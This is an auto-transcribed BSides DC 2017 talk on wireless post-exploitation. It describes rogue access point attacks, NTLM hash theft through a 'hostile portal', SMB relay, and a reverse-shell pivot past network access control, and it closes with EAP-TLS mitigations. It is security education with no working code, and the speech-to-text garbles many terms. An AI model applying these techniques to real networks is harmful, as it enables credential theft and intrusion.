The Black Art of Wireless Post-Exploitation

the besides DC 2017 videos are brought to you by threat quotient introducing the industry's first threat intelligence platform designed to enable threat operations and management and data tribe a new kind of startup studio co building the next generation of commercial cyber security analytics and big data product companies my name is Gabriel Ryan I'm US penetration tester at Gotham digital science we're like Aeons security consulting arm I guess I could call it that anyone here from the Northern Virginia yeah no I'm like really happy to be here because like my first security job was actually in Northern Virginia so I'm pretty thrilled I don't miss the traffic though you know but yeah so a couple new

things in this presentation we're gonna be talking about two new types of wireless technique we're going to talk about hostile portal attacks which is a way of grabbing Active Directory credentials without having direct network access and we're also going to talk about indirect Wireless pivots which is a way of using rogue ap attacks to bypass port based access control mechanisms on wireless networks so before we go into any of this we have to take like an obligatory look at wpa2 EAP and no discussion about wpa2 EAP is really complete without talking about rogue ap attacks which is the means that you typically use to steal credentials for these kinds of networks so Rogan Pete sacs are the real ones the bread

and butter of modern wireless networks you can use it for stealthy man the middle attacks you know stealing radius creds as we've said all kinds of really cool stuff and the simplest that this the simplest example of how to do a rogue ap attacker the simple simplest rogue ap a check out there is something called the evil tone attack just to use an analogy actually first given to me by that guy right there who got me into wireless big round of applause for that guy okay sorry Scott so it's a good analogy of like you know how evil twin attacks work is let's say that you have an open network and we're gonna call this DEFCON

open because it's probably the most secure network in existence and everything yeah so you have these these four devices and they're associated with this network if you were to spin up your own wireless hotspot right and you were to give this hotspot the same network name SSID and channel as the one that you're attacking how would these devices be able to tell the difference between these two these two access points well the truth is that they wouldn't be able to and as long as you're able to provide a better signal-to-noise ratio that is your signal strength is is better than the other one these devices will actually drop their connections and associate with you so that's that's the

fundamental you know rogue access point attack that pretty much everything else is based off of our spans off of so these attacks I mean they're not anything that they've been around for like a really really long time the first one you know they started emerge around 2002 the first documentation that I could find was the wireless LAN security fact by CW Klaus that starts talking about evil twin attacks about a year later you have a asleep released by Josh right which is a total expands off of that 2004 you actually see the implementation of a karma attack by Dino Diaz oviya and Shane McCauley four years after that you have free radius wpe which is actually Josh

frightened Brandon Tana woods figured out how to use his attacks to steal credentials from radius networks welcomewelcome grabbed a seed and you know by 2014 karma attacks had actually stopped being relays effectives that used to be so two researchers from from South Africa Dom whitey de Villiers came up with the improved karma attacks you know released a tool called mana that actually mean I made these attack very very very effective once again and you know very recently the guy who wrote Wi-Fi Fisher came up with a lure ten attack which exploits Windows Wi-Fi sense to you know a whole new way of doing this so as you can see I mean is this is actually a very

there's a pretty rich history of of using these kinds of attacks rogue ap attacks are they primarily are used to feel like one of two functions the roles that they fall into are either man the middle attacks which you can use to steal credentials for things or they're used to breach WPA or wpa2 networks the ones that use the EAP so in this talk we're going to something a little bit different we're gonna talk about rogue ap attacks as a means of lateral movement so before we can continue we also should talk about you know how would you use a rogue s1 attack to breach at WPI 2 EAP network so anyone here actually know how

EAP works ok awesome great so logically we're gonna start out with kind of a logical high look high level look at how EAP works right we're looking at EAP peep and EAP TLS specifically so logically the the way that you aap works it it it's a transaction that occurs between a client the client and the authentication server so the first thing happens to the client that's like your wireless device your laptop or whatever it's gonna send an authentication request to the authentication server the authentication server is going to respond with an x.509 certificate and it's going to send the client now that the reason why it's doing this is it needs to establish the client that

it can be trusted otherwise the client doesn't know who it's actually attempting to authenticate with so at this time at this point the client then either accepts or rejects the certificate if it accepts the certificate it means it trusts the authentication server and secured tunnels establish between the client and the authentication server so once that secure tile is established we move on from from the outer authentication which is where we were at before and then we now start begin what's called the inter authentication process which is this is actually where you know credentials are entered and you know you enter in your username and password and that stuff gets sent to the authentication server we'll look more at how that works in a

second but that authentication that inter authentication is going to occur through this secure tunnel and the reason why you need that secure tunnels that remember that you know EAP is the method as the authentication mechanism that we're using to provide access to the WPA capabilities of the network so until this entire process is finished this WPA network is not actually operating as a WPA net network you don't get that WPA until after this process succeeds so this entire this entire transactions happening over open Wi-Fi so without the secure tunnel and it's hacker could actually sniff this the inter authentication process offline and derive the password that way and actually legolas implementations of EAP were highly susceptible to this think

like EAP md5 just pretty prevalent you know like ten years ago so when I mentioned that there was actually you know two parties involved this transaction that's a bit of an understatement and there's actually three the the being the authenticator so we talked about the client device the technical name for that's the supplicant that's that's that's your devices connect to the network and you have your authentication server and this is the radius Center that's handling this transaction but in the middle here there's something else and that's your access point the access point we refer to it as an Authenticator if you look at the RFC's that's the name that's used and and the job of the Authenticator the

access point is to kind of act as a mediator between the client device in the authentication server and the reason why we need this is because this the supplicants peeking over layer two and the authentication server only speaks over layer seven using the radiance protocol so you need this this access point in the middle to act as an intermediary now remember that this access point until the process is finished is is acting as an open access point right so what this means is that remember how we talked about how open access points are susceptible to evil twin attacks another rogue access point attacks so what that means is that because until this process is completed

you know that this access point the Authenticator here is also susceptible to those very same attacks so what you can do as an attacker is impersonate a wpa2 EAP network and and enforce clients to attempt to authenticate with you and if you're using a p-p-poor EP of TTLs as your outer authentication mechanisms then you're going to have a situation where you can force clients to connect to you force them to authenticate with your own rogue radius server and you know hopefully what that will get you as an MS chappie to challenge and response which you can then use to derive radius passwords or radius and T password hashes which are password equivalent so this attack that I'm just describing was

was first described by Brad and Tonto in 2008 and to make it even worse actually as anyone here familiar with ms Chafee - okay out of you - who raise your hands how many people think that ms Jeffy - is amazing yeah I see some some pretty yeah like no no no okay so yeah I'm just happy to of the problem is that you know a P P for example it this outer authentication protocol it's bad enough that you can force stuff to connect to using a row of AP attack but the inner the inner authentication mechanism that's used typically is mschap e2 and there are a couple ways of cracking Emma's Chaffey to the traditional way is

that you take that EAP challenge a response that you that you've captured and you just can you know iterally you know perform a dictionary attack can take the password and the challenge and then try to you know combine them to create a message happy to response you try these sequentially over and over again until you find the right password that's a dictionary attack unfortunately the success rate of this attack is inversely proportional to the strength of the password save a really complex password you're gonna the more complex that password the more you're going to get diminishing returns fortunately or unfortunately depending on your perspective 2012 couple researchers named Moxie Marlinspike and David Holton came up with a

divide-and-conquer attack that can just completely bury MS Chaffee - it turns out that they discovered the MS Chaffee 2 uses it uses it basically it's basically 3ds encryption so if you're not familiar with what that means 3ds you can actually break it down into a single des of encryption which is only 56 bits ntlm v1 actually has the same problem and because you can reduce it to this this this very very small 56 bits of encryption you can actually recover that pass for equivalent NT hash that we mentioned earlier you know within 24 hours using that using a proper FPGA based cracking rig with a 1 percent success rate so it's very very very crackable so just a quick demo of how

this attack works you know right right now from the attackers perspective you'd first create a cert which is what you're seeing here and this is just a simple self-signed cert and once you create that certificate yeah you then create the the the evil twin of the network that you're targeting I'm gonna kind of fast forward through that a little bit and you're going to get a client associating so here you see like the the client associating with your network and this is what you see on the attackers perspective you know you'd see the the username the challenge response and that would all be sent to you as the client device attempts to authenticate with you you know from there the

dictionary attack what it would look like using a asleep would be this the the divide and conquer is a bit complicated so I'm not really showing it here but that's that's pretty much what you'd see and you see we were able to recover a password that way so the mitigation for this was what's introduced about ten years ago as well this was in 2008 there was an RFC 5216 a new form of EAP was released called EAP TLS and EB EAP TLS uses mutual certain certificate based authentication you know for its outer authentication layer so because of this this this this use of client-side certificates it pretty much stops rogue ap attacks dead in their

tracks that the problem with EAP TLS is that it's also like really really difficult to integrate any any network administrators out there know network administrators Wow okay so well from the perspective of a network administrator that the difficulty is that EAP TLS is really can be really difficult to implement you have to you know have an internal CA that you set up you have to have a certificate place on every single device that you wanna be able to connect to your network and and you know all of this essentially creates a classic security versus convenience scenario where you're forced to to to choose between an authentication mechanism that's very very difficult to implement or also or use a very insecure

authentication mechanism the form of EAP P but P TLS so you know this creates a market gap where you know products you know that you have people essentially the scripts of market gap for products that can be used to compensate for the security issues found at EPP you need to be TLS but are also easy to employ and easy to use I know so the current trend that we see a lot is instead of focusing on breach at prevention which would be preventing you know attackers from accessing the network in the first place you instead see a focus on on containing breaches that that occur once the attacker is on the network and that's what we're trying to address here is

whether or not this this strategy actually works and before continue have a little cartoon for you okay it's a little let's read some foreshadowing of what lies ahead so the most popular way by far of addressing the problem of breach containment is to use an AK mechanism to distinguish between you know authorized and unauthorised endpoints as they're added to the network so the idea here is a new endpoint is added to the network aka a new device connects to the wireless network the nack identifies whether this new endpoint is authorized to be there or if it's not authorized to be there if it's not authorized you know some kind of restrictions placed on the device usually place in a quarantine

VLAN where I can't really touch anything there are two ways you know historically we've had two ways of doing this you have agent basin acts and you have agent list necks so agent basin acts it's it's the kind of the way that works is that you have a software component called an agent that's installed on every single authorized endpoint on network and these agents communicate with the brain of the neck and report back information about both the internals of the device as well as you know external information as well so this is really really effective unfortunately now you you're in another situation where you have to have a piece of software living on every single

device on the network and this makes it you know pretty much just as impractical as eap-tls and on the other side the spectrum you have agent listen acts agent listen acts they use combinations like passive fingerprinting active scanning you know a traffic analysis stuff like that and the idea here is is to completely take a completely external approach to identifying endpoints however the problem with this is that you have no way to identify the internals or examine the internals of network components so you can easily bypass these just by finding an authorized device to masquerade as so I mean this kind of leads us back to the same problem we looked at before you have a recurring dilemma in security

versus in practicality you know you have on one side the spectrum you have these highly effective solutions in the form of agent basin acts and also like very easy deploy but also less than effective solutions in the form of agent listen acts so this leads to another market gap right where there's a huge demand for a solution that can offer deep interrogation capabilities that you find with like an agent based knack but without all that additional overhead so I mean this has led to the rise of the next-generation neck these are actually pretty interesting there there are a lot of really interesting solutions to them there's there's one in mind that I thought was like a really interesting approach but

also just at the same time really just kind of drives the point home as to why you know this this isn't like an easy easy paradox to bridge unfortunately no I actually tried to I actually tried to borrow one from work to bring here and do a demo with so I opened up a ticket of course you know that didn't really go as I probably should've expected that but interestingly enough also illegal kind of reached out to me just like you you got to keep this vendor neutral so I'm like okay so in the interest of being vendor neutral we're going to refer this hardware vendor as vendor a and if you're really curious I'm sure you can

find a bunch of products that kind of match the description on Google but a really good example this is vendor a vendor a uses WMI to interrogate new devices as they're added to the network and and by doing this it's able to perform those deep internal checks without using an agent and you know the way that does this is Anna Kate's over SMB using a single administrative service account so device it's added it authenticates with the device using the service account or attempts to and then at that point once it's authenticated with this device it uses some some pretty deep administrative privileges to look at the internals of the device and examine how it works the problem with

this is it creates a single well anyone anyone see a problem this yet yeah yeah responder so you have a single point of failure you have a device that's a you know attendeth on okay authenticate with everything that's added to the network using the special service account and this service account has access to nearly everything on the network typically it has DEA privileges actually which is really scary so you have this device that although it's able to do these deep checks relatively easily it's also sending god mode hashes to anything that you add to the network so of course you know the the first risk that comes to mind is is using you know something

like impacted or responder to perform S&B relay attacks where just add something the network wait for this thing to authenticate with you really the authentication attempt is something else and pivot into it and actually you don't need a man in the middle there because the nak applies is trying out thank you with you of course you can mitigate this fairly easily by enabling SMB signing although it's worth mentioning the s and B sign dates usually it's disabled by default on everything about the domain controller but this doesn't really address the issue of hashes being sent directly to untrusted endpoints so I mean it's interesting that this matter actually offers a piece of software that you can

install on every single thing on the network to kind of address this issue this is starting to sound a lot like an agent again and considering that the chief selling point of this thing is that no agent is required I feel like we're back to square one again and you know once again I'm not really like I you know I think I think you know most I don't think that this particular solution is like you know better or worse than any of the other well what's it called next generation acts out there I just I think it's a really really good example of how there really is no magic bullet in this in the situation you

can't really always have security with convenience and and especially when you're talking about access control or authorization or authentication I think it's actually a total paradox so kind of going back to wireless in general another really interesting wireless security control that you see a lot is client isolation and Athiya you know the idea behind client isolation is that you prevent wireless devices from communicating with one another you usually use this as a security control typical use case would be like an open network like the hotel here for example you may notice that you cannot ping other laptops that are associated with the network and there's a reason for that the idea is to keep people from

attacking each other once they're on the network so the way the 802 dot 11 is supposed to work is that the AP is supposed to mediate all communication on the network right so in theory if this guy down here that can you guys see my mouse moving around cool in theory the way that's supposed to work is if this guy here is trying to communicate with this guy the AP can just intercept the packet and drop and say no you can't do that but the problem with this is that you know client isolation really is a logical control is not a physical control so back in 2005 the late Cedric blancher awesome research from forcellino longer with us he posed a

question how do you prevent radio transceivers from communicating with one another and the answer was you can't so he introduced this tool called Wi-Fi tap which was released by Cedric Blanchard 2005 later revived by Oliver Lavery of Gotham digital science it's actually way before my time but the idea is that why fight actually Wi-Fi tap actually reads packets from the victim to the AP using a Wi-Fi interface in monitor mode and it gives you a ton tap device that's bridged to this modern mode interface and lets you interact with that monitor mode interface and what this allows you to do it allows you to inject responses to packets as if they came from the AP

so I mean this allows you to do two things I mean one it actually lets you interact with devices that are associate up with a wireless network without actually being associated with that wireless network yourself and for more it actually lets you bypass client isolation and I think I cover this stuff okay so there are some later tools that do even more cool stuff so ayrton ng you can do the same attack with WEP tkip ton ng this is also part of the aircraft suite you can you can inject you know this pack injection stuff but with WPA 1 wpa2 there are some attacks that that theoretical attacks anyways that really have been implemented that theoretically

are able to you're able to do this with wpa2 whole 196 comes to mind it's worth mentioning that most of these are purely theoretical and actually haven't contested and are really up to considerable debate but for the sake of being thorough I just kind of throw them in there but I mean here's a quick demo of Wi-Fi tap in general if you look at the top right we're actually going to create an access point just using so we've created here an open access point with the SSID example Wi-Fi and we're going to connect to it from our host operating system this is a VM and this is a second VM and this is our host

right here in the bottom right so we're going to connect to example Wi-Fi from our from our host operating system and then if we go down here we're just going to send a bunch of ICMP packets for us and five ICMP packets to our AP from our host operating system and you notice that we send five ICMP packets and we receive five responses that's expected so now we're gonna do is we're going to start up a modified version of Wi-Fi tap called Wi-Fi ping which is actually a really you know cool way of like demonstrating how this works and what Wi-Fi does is anytime it sees an ICMP requests it injects an ICMP response and

and it so we're gonna do that from the attackers virtual machine over here it says this terminal you see here so we're gonna start up Wi-Fi ping and Wi-Fi ping is now running and we're going to once again sent five ICMP packets but notice that instead of receiving five ICMP responses we see ten ICMP responses and that's because we're injecting them over from this thing and that just kind of demonstrates you know just the very simple wireless client isolation bypass so food for thought we've been you know so far like I think a lot of the conversation is really focused around you know whether or not an app can be used to stop direct attack from an attacker

who's gained access to a wireless network but I you know what if we're missing the point here you know network access control isn't the only problem when containing wireless breaches you know if you think about the role of nack in a wireless network it's being used to prevent attackers from accessing sensitive resources after a breach occurs you know so when an authorized endpoints detected you take one of one of two possible actions you know either it place the endpoint in quarantine or you block the port completely so what this is is that when you're violating access control policies you're causing the nack to impose some kind of restriction in a wired network that's the physical

restriction but in a wireless network this can only be a logical restriction as we just saw with with Wi-Fi tap more than that later so I want you to imagine a pretty typical scenario if you're if you're incorporating the wireless into you know your Red Team engagement or your pen test right you're attacking the wireless network and this here this particular wireless network is is used to access sensitive resources in other words a legitimate user could get on this wireless network and from there access stuff like you know production databases the domain controller eventually have that kind of access it's not just used as a straight pipe out to the Internet so assume you've already

breached the perimeter unfortunately you've been placed as the attacker on a quarantine VLAN by the snack appliance it's just kind of here's the neck here you are on this quarantine VLAN over on the restricted VLAN there's a bunch of sensitive resource and that's ultimately what you want to get access to because you know if you can't get access to that you really haven't demonstrated anything in the first place fortunately for you you know that you have at least one victim device on this restrictive VLAN because you would have had to have compromised you would have had to use the Rove AP attack against this victim device in the first place to get Radiesse credentials that would get you

onto this network so the question here is how do we get out how do we get from this quarantine VLAN over to this restricted VLAN or over here where we can actually get all the goodies like sensitive resources so you know anybody here every user spotter before okay yeah everyone so for those of you who do not know one we have to go over a couple things that we're gonna like incorporate into this attack that we're gonna use to perform this this pivot we're talking about the first is element RM betina's poisoning so in case they're aware the way that NetBIOS name resolution works is that first you're gonna check the look that when a computer tries to

resolve something using resolve a hostname using a NetBIOS name solution it first checks its local cash if that doesn't work it's gonna check its lmhosts file if that doesn't work it's going to attempt to use local DNS and if that fails we're gonna fall back to two closely related protocols that pretty much behave the same way element RMB T&S and the way that that works is element art meatiness is going to send a broadcast request out to the entire subnet so the way that does this if you can think of two computers named Allison Lee Roy Lee Rose a file server and Alice wants to request a file from Lee Roy but Alice does not know Leroy's IP Alice

will first attempt to work through those first those those first NetBIOS name resolution steps that we talked about before but suppose that fails at this point alice is gonna make a broadcast request to the entire subnet using element r mb t and s and every computer on Alice's subnets going to receive this request and what happens next really depends on the honor system the ideas that only Leroy will respond to this broadcast request and and and provide Alice with with an IP unfortunately you know there's no honor among thieves you know if we're an attacker and we're around the subnet we can simply listen for these broadcast requests and and and respond to all of them and if Alice

receives two responses it's only the first ones can be considered valid so this creates a race condition that can be exploited to trick Alice the victim into sending traffic to the attacker so quick timing pretty pretty widely widely available tool called responder by Laurence Joffe and you see here we have a bunch of rogue servers here with an HTTP server HTTP server SMB server these are all listening for authentication attempts and we have here our poisoners we have our element RM between s poisoners up there as well and they're running and we have our victim machine over on the right so the victim machine is going to attempt to access it's gonna attempt to map a non-existent share or

an SMB share our non-existent host right and what that's going to do is because the host doesn't actually exist it's going to force the fallback to element R and B T and s so allow us to attack it so we put in this non-existent host name as well as well as an SMB share and there we hash is on the left because it we were able to poison requests and forces try to authenticate with us so we're about 5% for a little escape attempt here but there's something else you have to cover as well the other thing we need to cover is redirect SMB so anybody familiar with redirect SMB okay this guy obviously obviously uses all the things cuz so

redirect SMB essentially the idea is that you you force a victim to visit an HTTP endpoint and this HTTP endpoint corresponds to an HTTP server that you control this HTTP server does one thing and one thing only and that's redirect all HTTP requests to an SMB share because you can do that so what'll happen is the the the victim will click this link their browser will go to your your your rogue HTTP server via rogue HTTP server will redirect that browser to an SMB share that you on a server that you control the browser will then be forced to authenticate with your rogue SMB server and you get hashes that way so this is pretty cool it also

requires social engineering because you have to click if the force a user or coerce the user some way to click this link so this is we're gonna start talking about new stuff the first thing we tackle get introduced is the hostile portal attack and it's essentially a combination of the stuff we just talked about and it's a means of kind of leverage that the leveraging the stuff to steal ad credit from wireless network without network access so have you guys seen something like this lately the captive portal yeah they're pretty cool right so a captive portal it's used to restrict access to an open Wi-Fi network and the way that they usually work is that you know there was you know that

you typically have a specially configured DNS server that's running there was all resolves all DNS queries to the captive portal and and also all DNS traffic will be redirected to the cafe traffic captive portal so that the the user cannot just manually specify their own DNS server in addition to that if you really want be nasty you can also redirect all HTTP traffic to the the server that's that's hosting this captive portal login page so the net effect is no matter where you try to navigate to you're just redirected to this login page so a hostel portal tag kind of expands on this right it's based on the both the redirect s and B and

also like a captive portal technique and it is that you first force a victim to connect to you using rogue ap attack but then what you do is you simply redirect all HTTP traffic to an SMB share on your machine and you run a rogue SMB server in the background so the what happens is that the user is forced to connect to you but instead of being redirected to a captive portal there they're forced to redirect to your rogue SMB server and what happens is then they're forced authentic cute with you and they give you hashes so that's it's a really fast way to grab hashes in addition in case that you know that they

just have to be idle at the time you can also poison elvenar and every TNS in the background so you can you can also attack them that way as well simultaneously so a quick demo of how this would work we have here where this is this machine here is our legitimate network and our our victim is down low in the bottom right and is associated with this legitimate network this is an open network we're going to talk about how to do this with EAP people Network syn a second but there's a couple more steps involve it doing so and over here we have the attacker the first thing the attacker is going to do is use some D

off packets to force this victim to roam over to the the attackers rogue access point now the victim in the bottom right is going to open up ie and the second that this it tries to set start sending HTTP traffic you end up with hashes which is what you see here actually really interesting thing about IE right is that when you type stuff in the address bar it doesn't autocomplete thing which sends an HTTP request so every time we type a new letter and here we're actually receiving the hashes over and over again so good job ie so yeah when you you know in most cases we also need to talk about how to do this with a

WPA EAP network because in order to kind of tie this to the scenario we were talking about addressing earlier we need to be able to use this with networks that use apt TLS or eep eep eep this actually is significantly harder because both of these use mschap e to as an internal authentication mechanism and you know what this means is what I mean by mutual authentication mechanism eken ism is that the radius server must actually prove knowledge of the client devices password for the internal dedication attempt to succeed you know so previously you know we were able to demonstrate that you can force a victim to associate with you an attempt to authenticate with you right and it will

go through all the steps of the authentication process to the point where you actually have an MS happy to challenge a response which you can crack offline to derive radius credentials unfortunately what's gonna happen at the very end of that process is that you as the attacker you're you as the authentication server need to then authenticate back with the client and demonstrate the client that you also know the clients radius password and if you can't do that the authentication intent is gonna fail so I mean this is something that we really need to overcome because pretty much any interesting rogue ap attack that you want to do aside from simply stealing radius credentials you're going to need

a full Association from those clients that are connecting to you now there are a couple ways of doing this the there already exist I mean for weak rated scree Angeles you can use something called Auto crack and AD this is a technique that was developed by Dominic white and named de Villiers in the same talk where they improved karma tax 2014 and that'll work for weak radius creds for stronger radius creds remember that we can crack Emma Chaffee to challenge and responses relatively quickly so of course you could just crack them offline come back and finish the attack once you have valid radius credentials let's talk about both both of these so the very end

of the MS Chaffee to challenge Emma's chavvy to authentication process the victim is going to send a challenge response by the way this overhears the victim this overhears hostapd hopes to hostapd is the is that is essentially what you use as a radius server whenever you're you're performing this kind of attack so the first thing is gonna happen the very end of the Emma Chaffee to authentication process is that the victim is going to send a challenge response and that's the thing that you used to crack the the radius creds to to your radius server which is hostapd hostapd at that point is going to attempt to load the victim's password from this thing called the EAP user

filing EAP user files essentially a primitive database that's implemented using a text file that has information about you know you've different users and how they can authenticate and you know what their passwords are etcetera so it's going to temp to load that password and then from there it's going to use that password to construct an authentication response that is sent along with the authentication success method message to the victim of course if you don't already have the user's password or password hash or NT password hashes I say you're not going to be able to accurately construct this authentication response so this this part of the process here is going to fail and they're not good and the

authentication attempts going to fail so the way that you get around this using auto crack and AD is auto crack and AD the way that it works is that the second you receive the challenge response you actually modify hostapd so that instead of immediately loading the password from the AP user file you instead shoot off the challenge challenge and response off to a remote cracking rig somewhere which presumably is equipped to crack these passwords relatively quickly so you've essentially make an API call to your cracking rig the cracking rig at this point cracks these radius that limits a fee to challenge a response to get an NT password hash and then you just append that that NT password hash or password

to the end of the EAP user file at that point you continue with this with this image a fee to authentication process by loading the the newly appended password from the EAP user file use it to construct the authentication response and send that with the authenticated authentication success message off to the victim so that can work with with weak passwords and it could take anywhere between a few seconds or it could take a couple tries because really boils down to can you crack it in time before this authentication attempt times out but for well it's a relatively weak passwords this should work but you know between like four or five tries for stronger for stronger passwords for

stronger ADA's passwords you you you aren't gonna be able to do this because you're not going to crack it in time but remember that the with the divide-and-conquer technique you have a 24 hour maximum the amount of time if you're using FPGA based hardware to crack these to crack these credentials so here's a demonstration of how you just incorporate the the the auto crack and add technique it looks a lot like what we did before you know we first forced the that's gonna take a couple tries to force the the the victim over here to associate with the attacker to authenticate with the attacker and you see here this time the the victim is being you know prompted with this this

certificate warning because we've we've given them an invalid certificate but we've gotten them to associate with us and as before the second they opened up by e HTTP traffic is sent we're able to redirect that to our SMB server and we get their hat their password hashes that way so what this gets you is lost in lots of ntlm hashes get really similar results to what you get with element Arnav 18s poisoning there a few key advantages here for one thing you don't need to reckon at work action so you don't have to be like on the network in order to do this the other thing is that you're not limited to just attacking a local subnet you get

everything that's connected to wireless so that's that that's pretty important and and and and most important it's not a passive attack you're not waiting for broadcasts or a request to appear on a local subnet you're actually making this happen so back to our scenario we can we can use this technique that we just talked about the hostile portal we could build off of that too to do something called an indirect Wireless pivot and that's a way of using rogue ap attacks to bypass port based access control mechanisms so we mentioned here that we're stuck on our quarantine VLAN and we want to get over to this restricted VLAN and be able to access these sensitive resources here and we have a

victim device that that is on the restricted VLAN as well and we have this knack that is kind of preventing us from doing that so the first step that we can do we could first force these a rogue a P attack well actually assume that we have two network interfaces first of all our first interface has an IP address on this quarantine VLAN the second interface is free to perform more attacks so we're gonna use the second wireless interface to force this victim device over to our over to our own network can we control using a rogue ap attack at this point the particular rogue ap attack we do is we'd use a hostile portal attack and that would

allow us to redirect their HTTP traffic to an SMB share that we control and that as before we will demonstrate this this will allow us to obtain their ntlm hashes which we can crack offline right at this point we continue attack where we left off we might have to repeat the step where we get them to connect to us once we've cracked their ntlm hashes and at this point we're able to use that that access to place a time payload like a scheduled task or something like that on the victim we then kill a rogue ap this allows the victim to re associate with the wireless network that they were on previously now this victim despite the fact despite

the fact that we've we've exploited it it is still an authorized device so the nack mechanism here moves it to the restricted VLAN at this point we rate we wait for that that that scheduled attack task to execute that gives us a reverse shell to our interface that's honor on the quarantine VLAN and allows us to pivot on to the restorative VLAN through the the authorized device so that's that's a simple indirect wireless but there's a better person doing this if you can pull it off so suppose you have two victims of Isis and an account that can be used to access both you could then force both of these devices to associate with you and you know as

before you use the hostile portal to get them to send you ntlm hashes at this point though instead of simply capturing hashes we're going to relay that authentication attempt using SNP relay attack from one victim to the other this will allow you to instantaneously place a time payload on on one of the victims you let the the victims reassociate with the target Network as before they're moved back to the restrictive VLAN because they're still authorized devices and as before we wait for the reverse shell so quick demo of what this would look like we have two we have Leroy and Jenkins our victim devices here Leroy's in the top right Jenkins is in the is in the top left here we have our

attacker anybody ever use Empire you again so we have we have a Empire instance running here remember using Empire for to manage our payloads we're going to be using impact it to do our SMB relay attack and we're going to be using a pamorah to do our Rove ap attack and over here we have our legitimate access point that these two the victim devices are connected to and I'm gonna come out fast for this so we have to listener set up and we also have our SMB sort relay server running there so we're gonna start a recipe really it's really servers the first thing we're gonna do is we're gonna pass initial powershell payload to our SMB relay server that's

gonna execute when we first perform the SMB relay attack when they put when they connect to us and then we're gonna start a Pam or here and then you as before we're gonna send some D off packets to these two devices to get them to Rome from from the legitimate access point over to our rogue access point so we're gonna do that really fast and it's kind of lagging there but wait for it there you go okay so that gets us one device associated with us all right step two we want to repeat that with the second victim device Leeroy all right now we have Leroy's associated with us as well at this point we need to pull

off yes and B relay attack right so we're going to to first start RS and B well actually we're first going to need to obtain the IP address of one of these devices that's associated us output that we see here copy it over to our SMB relay server here and we're going to paste it in there start the SMB relay server now for demonstrative purposes we're going to start we're going to start generating some HTTP traffic on one of these these target endpoints so we do that here simply by just you know typing stuff in the in the browser like we saw before and you see some activity there that's the SMB relay server doing its

thing that performing SMB relay attack and what you should see in about 40 seconds or so in Empire is an empire agent connecting back to our Empire instance and that will give us our initial shell and there you go initial agent from 10.0.0.0 now active we now interact with that agent and at this point we have if you look here I'm going to actually fast forward a bit as you can see here we now have NCI authority system privileges on Jenkins which is this this victim right here so at this point both of these devices are still associate with a rogue access point attack but we've used an SMB relay attacked to obtain a shell on this guy

right here on Jenkins so we're gonna use that initial shell to place a scheduled task on Jenkins that is going to connect back to our first interface which is currently associate with a target network and it's going to do that after you know like a set period of a few minutes so we're gonna do that really fast I'm gonna kind of speed through that and at that point now we we just we just kill our rogue ap and you'll notice here that in our and our legitimate AP that the the victim devices are reso sheeting with us so we've lost our initial shell but and and and when these devices are no longer directly connected to us

they're back on the target network and now we just wait for the scheduled tasks to execute the payload and connect back to us so something really interesting happened when I was actually recording this demo video and in that I actually you know forgot to do the thing in in in VMware or you connect the virtual network interface to your to your to your box to the attacker machine so you know initially what happen is that the the the time payload or the amount of that delay finished and I was like okay so where's the you know where's the shell I don't know what's going on here and then I realized that I'd forgotten to to connect a thing so I was

originally going to to refilm this and restart the demo from scratch but something really interesting happened which is that you know it turns out I'd actually set 120 retries on this agent that to connect back so this thing would 120 times attempt to keep connecting back to that listener so what ended up happening was and if you can kind of see here I'm gonna get to the point where I reconnect it and you see here I hit the back button oh yeah as soon as I did that I just got the connection anyways so I thought I'd leave that in there because it was kind of cool and it kind of you know at this point we actually

have as soon as I reconnect to the USB interface you know within seconds I had that that refers connection I thought I'd leave that in there cuz it's kind of cool and proves a point about you know well-written malware and well-written implants which is that you know even if you can enter a situation where you can't get a reverse connection immediately you know you can still write something that just keeps attempting to in various ways until it finally connects back to you so that's an indirect wireless pivot I mean the equivalent technique of doing this on a wired network would be simply unplugging an authorized device from from a switch or something like that and then

connecting it unto a connecting it to a hostile network on which you can attack it and and and what this void Emin straits is that port based access controls you know that they rely on the assumption that the physical layer can be trusted in a wireless network on the other hand the means through which you can trust the integrity the physical layer is wpa2 EAP so if you can't trust your EAP implementation an attacker can freely control the physical layer using rogue access point attacks this kind of you know makes the point of whether nak works or not kind of moot because you know if the attacker can control the physical layer port based nak mechanisms

are actually rendered useless so what this demonstrates is that port basin act mechanisms they don't effectively mitigate the risk presented by weak WPA to implement EAP implementations and also they demonstrate the ADI port based and act mechanisms to a wireless network it does not make the use of the apt TLS or a PP any listen to any less inappropriate if the networking questions use to grant access to sensitive information I'm gonna you know before we kind of wrap this up I'm gonna make like one last stitch kind of like you know plug for EAP TLS which is that it's it's actually not as bad as it used to be I mean you can use group policy to

configure 802 dot 1 X on clients that MIT that makes this a lot easier than it used to be and your best option for rolling out EAP TLS let's just use a private CA and to leverage Active Directory as much as possible to to deploy EAP TLS if you're if you're dealing with an MDM or I'm sorry if you're dealing with a bring your own device situation I mean you can just you distribute that server server to clients using either an MDM solution or a really streamlined BYOD onboarding solution and you can actually use let's encrypt for that as well although it's worth mentioning that even the folks that let's encrypt have stated this as far

from the best option out there so just to close this up just because wireless and wired networks do not operate just because they operate similarly at the logical level and and that's you know it on purpose right you know you don't want to have to be able to observe the differences between using Ethernet or a wireless network when you're using the network because that's kind of why we have that layer of abstraction but just because these things worked some early at the logic level does not mean they work the same way at the physical level so as a community we should really question whether it's truly a sound business decision to neglect EAP TLS in

favor more reactive approach that focuses on access control and threat containment and finally last but not not least most importantly actually the needs for convenience and security are often at odds with one another so maintain a healthy skepticism towards solutions that prom both and that's it Thanks

any questions sure yeah yeah well hostapd does actually which is the radius server that you'd use to perform the attack as for an individual radius implementations they may not work that way but I know hostapd uses the EPS or file yeah so yeah you'd get you'd get a prompt the user would get a prompt so yeah well that's that's what you're banking on the problem is that you're placing you're placing the burden on to the user to reject that that prompt and you know with an organization of like 200 to 300 people I mean I don't know man think about your workplace do you trust everyone not to click that prompt what's up

true but that that rules out BYOD as well what's up you would need that's a good question so effort for that particular attack you would need the the necessary privileges to one be able to access the device in the first place you'd also have to have at least like local admin on that device because you'd need to be able to do something like you know create a schedule tasks to make that then connect back to you in the first place so you would need you know some level administrative access in order to make that work if you're

you could probably automate that using the Empire API I have not done that but it can be done realistically though I mean you'd want to automate it as fast as possible so I mean that that's doing it like over like a few minutes which is decent but of course there's room for like taking it beyond a proof of concept stage and actually making it happen lightning fast just ideally what you'd want something else that's worth mentioning though you know how we used to schedule tasks in order to get the reverse shell to to execute well that might not always be the best way to do it because if you're talking about like a realistic scenario

